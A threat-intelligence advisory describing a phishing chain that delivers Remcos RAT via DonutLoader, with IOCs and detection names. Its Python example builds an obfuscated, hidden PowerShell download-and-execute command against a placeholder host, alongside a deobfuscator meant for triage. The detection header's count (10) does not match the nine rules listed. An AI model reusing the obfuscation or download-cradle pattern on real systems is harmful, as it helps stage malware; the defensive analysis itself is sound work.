Severity: high. June 4, 2026

DonutLoader Delivers Remcos RAT via Multi-Stage LOLBin Phishing Chain

Source report →

A campaign delivering Remcos RAT version 7.2.1 Pro was observed using a malicious CMD attachment, disguised as a business invoice in German-language phishing emails, to kick off a multi-stage execution chain that abuses a sequence of Windows LOLBins to evade detection. The attached batch file (Bestellung.CMD) launches WScript with a legitimate Windows App-V publishing helper script, a known LOLBin that passes its argument straight to PowerShell. PowerShell then runs Base64-encoded commands into which junk strings have been interleaved as a first layer of obfuscation; the command line strips the junk before decoding, which is itself a usable detection signal. Next, PowerShell downloads a password-protected ZIP archive from pCloud-hosted infrastructure, extracts it with 7-Zip using a password argument, and runs the JScript file inside as the next stage.
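As an added illustration (not code from the source report, and not the campaign's real command line, whose junk token, payload and download target are not reproduced on this page), the following Python models the first obfuscation layer described above and a triage routine that reverses it. The junk token qzQz, the decoded command and the example.invalid URL are placeholders chosen for this example.

```python
import base64
import binascii
import re

# Constructed sample; the campaign's real junk token, blob and download
# target are not on the page, so these values are placeholders.
JUNK = "qzQz"
PLAIN = "IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/stage2')"


def obfuscate(plain, junk=JUNK, every=6):
    """Model the first-layer obfuscation: Base64 of the UTF-16LE command
    with a junk token spliced in every few characters."""
    b64 = base64.b64encode(plain.encode("utf-16-le")).decode("ascii")
    return junk.join(b64[i:i + every] for i in range(0, len(b64), every))


def build_cmdline(plain, junk=JUNK):
    """Assemble a PowerShell command line that strips the junk with
    -replace, then Base64-decodes and invokes the result."""
    blob = obfuscate(plain, junk)
    return (
        "powershell.exe -WindowStyle Hidden -NoProfile -Command "
        f"\"$s='{blob}' -replace '{junk}','';"
        "IEX([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($s)))\""
    )


# Junk-removal operations of the form  -replace 'TOKEN',''
REPLACE_RE = re.compile(r"-replace\s+'([^']+)'\s*,\s*''", re.I)
# Candidate Base64 blobs: long single-quoted runs of the Base64 alphabet
BLOB_RE = re.compile(r"'([A-Za-z0-9+/=]{16,})'")


def deobfuscate(cmdline):
    """Recover the plaintext command from a junk-interleaved Base64
    PowerShell command line; return None if nothing decodable is found."""
    blobs = BLOB_RE.findall(cmdline)
    if not blobs:
        return None
    blob = max(blobs, key=len)
    # Apply the same junk stripping the command line performs on itself
    for token in REPLACE_RE.findall(cmdline):
        blob = blob.replace(token, "")
    try:
        raw = base64.b64decode(blob, validate=True)
    except binascii.Error:
        return None
    # Unicode (UTF-16LE) payloads have a NUL in every odd byte for ASCII text
    if raw and len(raw) % 2 == 0 and not any(raw[1::2]):
        return raw.decode("utf-16-le")
    return raw.decode("utf-8", errors="replace")


if __name__ == "__main__":
    sample = build_cmdline(PLAIN)
    print(sample)
    print(deobfuscate(sample))
```

The decoder is deliberately structural rather than signature-based: it keys on the -replace operation preceding the Base64 decode, so it still works when the junk token or the payload changes.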

The JScript stage runs an AutoIt3 interpreter against a file with a .png extension that is not an image but an encoded AutoIt script carrying XOR-encrypted shellcode. That shellcode is the DonutLoader framework, which reflectively injects into a legitimate Windows Color Management utility (colorcpl.exe) and loads and runs Remcos RAT entirely in memory; the final payload is never written to disk.

Once running, Remcos RAT gives the operator full remote control: keylogging, screenshot and webcam capture, microphone recording, file system access, credential harvesting, and the ability to drop additional payloads. Because staging relies on a legitimate cloud file-sharing service and every step up to the injection is carried out by built-in Windows binaries and scripting interpreters, the chain leaves little for signature-based detection to match. The practical detection opportunities are behavioural: the parent/child process relationships, the command-line patterns and the mismatched file extensions captured in the detections listed below.

SHA256 file hashes (4)
5b3089eefab0e043af8894de86022bdc6df2f42f7098dbd530f42c0ec861d5d8
14a0d7978872a2739ac31ef42539e8c708af6afccc5eb74f22fe2b676bfa2df7
b9da295c34accf3632c2c4b6d9e3c74791b4514d27814f79e9bcb77ce168a347
48bd36c3b8d6a3bf5db4e7b0bbc1692e8cb900475dc7ae16e9f1fa7ba97c8adf
File names (4)
Bestellung.CMD
iphdcrtj.js
iphdcrtj.zip
USCSHBRBWUYUCQNUIBPWLVUFKIAGWBOOAKDDXWTGRUVHWXIHQQRQXJASLKLALICCV.png

Detections (10)

  • Suspicious PowerShell WindowStyle Option
  • Suspicious Creation with Colorcpl
  • Script File Attachment in Email
  • Script Interpreter Execution From Suspicious Folder
  • Malware Email Delivered Through Defenses
  • PowerShell or Scripting Engine Downloading from filedn.com
  • 7-Zip Spawned by PowerShell with Password Argument
  • PowerShell Command Line Containing Junk-String Stripping Before Base64 Decode
  • Script Interpreter Processing a File with a .png Extension